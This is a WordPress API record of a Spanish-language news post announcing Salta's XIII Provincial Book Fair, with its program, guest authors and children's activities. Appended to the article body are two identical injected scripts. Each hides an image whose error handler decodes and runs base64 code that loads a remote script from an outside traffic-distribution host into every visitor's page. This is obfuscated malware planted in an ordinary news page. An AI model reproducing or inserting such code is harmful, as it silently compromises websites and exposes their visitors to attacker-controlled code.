{"id":3233,"date":"2023-10-31T20:53:41","date_gmt":"2023-10-31T23:53:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3233"},"modified":"2025-08-14T00:06:23","modified_gmt":"2025-08-14T03:06:23","slug":"comienza-la-xiii-feria-provincial-del-libro","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3233","title":{"rendered":"Comienza la XIII Feria Provincial del Libro"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><em><strong>Del 1 al 5 de noviembre en la Usina Cultural, se desarrollar\u00e1 una nueva edici\u00f3n de la Feria del Libro de Salta <\/strong><\/em><\/h3>\n\n\n\n<p>Desde ma\u00f1ana al domingo 5 de noviembre y de 15 a 22 horas en la Usina Cultural (Espa\u00f1a 1-98), se desarrollar\u00e1 una nueva edici\u00f3n de la Feria del Libro de Salta, la cual congrega editores, escritores y gestores culturales del \u00e1mbito provincial, regional y nacional, que se suman para enriquecer una propuesta ya consolidada desde hace trece ediciones.<\/p>\n\n\n\n<p>En esta oportunidad habr\u00e1 50 stands con editoriales de todo el pa\u00eds mostrando una gran diversidad en sus cat\u00e1logos: poes\u00eda, narrativa, c\u00f3mic, historia, investigaci\u00f3n, literatura infantil y juvenil, libros de m\u00fasica, filosof\u00eda, periodismo, entre otros. Adem\u00e1s hay una agenda de 250 actividades en las que se incluye: presentaciones de libros, charlas de escritores, editores, danza, cine, e intervenciones l\u00fadicas y art\u00edsticas como el bingo y las elecciones literarias.<\/p>\n\n\n\n<p><strong>Cultura en Democracia<\/strong><\/p>\n\n\n\n<p>El ciclo anual llevado adelante &nbsp;por la Secretar\u00eda de Cultura vinculado a los 40 a\u00f1os de democracia y denominado Cultura en Democracia, tendr\u00e1 un espacio central dentro de la Feria. Por un lado habr\u00e1 una instalaci\u00f3n inmersiva permanente a cargo de la artista pl\u00e1stica Rocio Ort\u00edz, la cual representar\u00e1 las diferentes formas de censura y persecuciones ocurridas durante la \u00faltima dictadura militar, contraponiendo con las posibilidades de expresi\u00f3n que en el marco del periodo democr\u00e1tico, venimos experimentando.<\/p>\n\n\n\n<p>En el marco del mismo ciclo y versando sobre la tem\u00e1tica, el viernes 3 a las 21 horas en el teatro de la Usina, se realizar\u00e1 una obra esc\u00e9nica a cargo del reconocido core\u00f3grafo V\u00edctor Campillay denominada \u201cDime con qui\u00e9n andas\u2026\u201d, la cual cuenta con diez artistas en escena y m\u00fasica en vivo a cargo de la DJ Lana Figueroa.<\/p>\n\n\n\n<p><strong>Invitados especiales<\/strong><\/p>\n\n\n\n<p>La Feria enriquecer\u00e1 su propuesta con cuatro invitados e invitadas centrales. La escritora Selva Almada, una de las m\u00e1s le\u00eddas y potentes del pa\u00eds, tendr\u00e1 una charla abierta junto a con Betina Campuzano el s\u00e1bado 4 de noviembre a las 21 horas en el Teatro de la Usina<\/p>\n\n\n\n<p>Guillermo Mart\u00ednez es otro de los lujos dentro de la grilla de la Feria del Libro. El consagrado y galardonado escritor mantendr\u00e1 una charla abierta el Jueves 2 a las 19 en el SUM junto a Ariel S\u00e1nchez Wilde.<\/p>\n\n\n\n<p>Tambi\u00e9n estar\u00e1 presente Hinde Pomeraniec, escritora y divulgadora de literatura y cultura. Su primera actividad ser\u00e1 el Viernes 3 a las 20 Horas en el Auditorio de la Usina Cultural, donde dialogar\u00e1 con autores locales: Fabio Mart\u00ednez, Santos Vergara y Gloria Lis\u00e9. Luego, el s\u00e1bado 4 a las 19 horas en el mismo espacio presentar\u00e1 su libro \u201cBlackie, la dama que hac\u00eda hablar al pa\u00eds\u201d, reeditado recientemente, el cual servir\u00e1 como excusa para hablar de su trayectoria y su trabajo junto a Patricia Patocco.<\/p>\n\n\n\n<p>Por \u00faltimo, el autor chaque\u00f1o Mariano Quiros tambi\u00e9n estar\u00e1 presente en la Feria. Dictar\u00e1 un taller de escritura el d\u00eda mi\u00e9rcoles 1 de 16 a 18 horas, titulado \u201cDigo la verdad cuando miento: la mentira m\u00e1s honesta y noble est\u00e1 en la literatura, en los cuentos y novelas que leemos, en el impulso y el deseo que empujan a la escritura. Un encuentro para leer y escribir desde nuestras mentiras m\u00e1s sublimes\u201d; el mismo requiere inscripci\u00f3n previa. Mariano tambi\u00e9n presentar\u00e1 su \u00faltima novela \u201cNuestra hermana de afuera\u201d el jueves 2 a las 21 horas junto a Roberto Acebo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/9655-comienza-la-xiii-feria-provincial-del-libro.jpeg\" alt=\"\" class=\"wp-image-3234\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/9655-comienza-la-xiii-feria-provincial-del-libro.jpeg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/9655-comienza-la-xiii-feria-provincial-del-libro-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/9655-comienza-la-xiii-feria-provincial-del-libro-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/9655-comienza-la-xiii-feria-provincial-del-libro-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/10\/9655-comienza-la-xiii-feria-provincial-del-libro-630x420.jpeg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<p><strong>Mundo Peque\u00f1o<\/strong><\/p>\n\n\n\n<p>La XIII edici\u00f3n de la Feria del Libro tendr\u00e1 un espacio \u00edntegramente dedicado a las infancias. Con m\u00e1s de 20 actividades l\u00fadicas, talleres, charlas, conferencias y presentaciones de libros, este espacio sigue poniendo el eje en las infancias como parte integral de la Feria.<\/p>\n\n\n\n<p>Mundo Peque\u00f1o contar\u00e1 con biblioteca adecuada para la edad, juegos, materiales l\u00fadicos, disfraces y mobiliario espec\u00edfico para los peque\u00f1os grandes lectores. Las actividades requieren inscripci\u00f3n previa y se realizar\u00e1n en diferentes espacios de la Usina Cultural seg\u00fan la capacidad estimada.<\/p>\n\n\n\n<p>Ver Programaci\u00f3n<br><a href=\"https:\/\/culturasalta.gov.ar\/feriadellibro\/\">https:\/\/culturasalta.gov.ar\/feriadellibro\/<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Del 1 al 5 de noviembre en la Usina Cultural, se desarrollar\u00e1 una nueva edici\u00f3n de la Feria del Libro de Salta Desde ma\u00f1ana al domingo 5 de noviembre y de 15 a 22 horas en la Usina Cultural (Espa\u00f1a 1-98), se desarrollar\u00e1 una nueva edici\u00f3n de la Feria del Libro de Salta, la cual [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3235,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-3233","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3233"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3233"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3233\/revisions"}],"predecessor-version":[{"id":6934,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3233\/revisions\/6934"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3235"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3233"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3233"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3233"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}